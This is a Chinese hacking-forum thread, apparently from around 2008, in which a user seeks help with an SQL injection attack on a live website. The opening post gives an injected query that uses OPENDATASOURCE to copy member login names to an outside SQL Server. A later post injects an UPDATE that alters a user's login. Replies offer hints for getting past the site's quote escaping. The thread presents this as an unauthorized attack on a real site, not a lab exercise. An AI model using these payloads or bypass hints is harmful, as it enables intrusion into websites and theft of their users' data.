[讨论]一个opendatasource的问题!
[讨论]一个opendatasource的问题!议题作者:寂寞宝贝
信息来源:邪恶八进制信息安全团队([url=http://www.eviloctal.com/]www.eviloctal.com[/url])
今天遇到一个郁闷的问题!在使用opendatasource宏的时候出现的!大虾帮下!
注入点类型:数据、MSSQL 数据库显错模式、支持多语句、DB_OWNER权限
在执行
[url=http://www.xxx.org/pulic/showinfo.asp?ID=271]http://www.xxx.org/pulic/showinfo.asp?ID=271[/url];insert into opendatasource('sqloledb','server=200.82.104.6;uid=sa;pwd=mypass;database=member').ly.member select LOGIN_NAME from member where USERID=1382--
提示如下出错信息
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'
接近 'sqloledb' 之處的語法不正確。
/pulic/showinfo.asp, 列90
弄了半天没搞定!不会是连接的问题,因为他都没连接我,可是这个opendatasource我一直都是这样用的!从来没出过这个问题!麻烦大虾们给个思路!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=968234&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子428 精华[url=http://forum.eviloctal.com/digest.php?authorid=31189]12[/url] 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 [url=http://hi.baidu.com/isbx/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=31189]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32576&repquote=140277&extra=page%3D8&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32576&pid=140277&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]
[url=http://forum.eviloctal.com/space-uid-31189.html]寂寞宝贝[/url] [img]http://forum.eviloctal.com/customavatars/31189.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 对了DB_OWNER没办法列目录,服务器只开了80!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=968234&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子428 精华[url=http://forum.eviloctal.com/digest.php?authorid=31189]12[/url] 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 [url=http://hi.baidu.com/isbx/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=31189]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32576&repquote=140278&extra=page%3D8&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32576&pid=140278&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-31189.html]寂寞宝贝[/url] [img]http://forum.eviloctal.com/customavatars/31189.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 测试了一段时间后,发现语句中貌似不能出现单引号,比如
&ID=247; update data set login='lonely' where USERID=1382--
这样就会报
Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'
接近 'lonely' 之處的語法不正確。
/publish/PublishInfo.asp, 列90
使用双引号就不会出现问题,但是语句中又不能缺少单引号!郁闷了! 执行
update data set login=lonely where USERID=1382--
这样也不会报错,但问题是这样语句肯定不会执行的! Microsoft OLE DB Provider for SQL Server 錯誤 '80040e14'
接近 '' 之處的語法不正確。
/publish/PublishInfo.asp, 列90
这个是执行[url=http://www.xxx.org/pulic/showinfo.asp?ID=271]http://www.xxx.org/pulic/showinfo.asp?ID=271'[/url] 加了个'号的报错信息,看着好奇怪!成功的男人白天瞎JB忙,晚上JB瞎忙;失败的男人白天没啥鸟事,晚上鸟没啥事。
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=968234&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子428 精华[url=http://forum.eviloctal.com/digest.php?authorid=31189]12[/url] 积分4620 阅读权限100 性别男 来自云南 在线时间172 小时 注册时间2006-2-7 最后登录2008-7-16 [url=http://hi.baidu.com/isbx/]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=31189]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32576&repquote=140293&extra=page%3D8&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32576&pid=140293&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP
[url=http://forum.eviloctal.com/space-uid-16052.html]remax[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 [img]http://forum.eviloctal.com/images/smilies/default/shy.gif[/img]
单引号完全可以突破,请参考字符方式注入..
另送关键词一个
定义变量..比如@x...20字节够写什么?
[url=http://wpa.qq.com/msgrd?V=1&Uin=37424654&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子325 精华[url=http://forum.eviloctal.com/digest.php?authorid=16052]2[/url] 积分911 阅读权限50 在线时间79 小时 注册时间2005-10-25 最后登录2008-7-13 [url=http://www.remaxz.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=16052]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32576&repquote=140609&extra=page%3D8&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32576&pid=140609&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=软件外包&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]软件项目外包[/url]
[url=http://forum.eviloctal.com/space-uid-80082.html]沉渊[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 注入点把引号双写了啦,想办法突破吧Dreamless world……
帖子25 精华[url=http://forum.eviloctal.com/digest.php?authorid=80082]0[/url] 积分179 阅读权限40 性别男 在线时间215 小时 注册时间2007-2-11 最后登录2008-6-30 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=80082]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=32576&repquote=140610&extra=page%3D8&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=32576&pid=140610&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日,预测咨询,公司改名,权威易经[/url]
[url=http://forum.eviloctal.com/space-uid-10282.html]皇子[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然
页:
[1]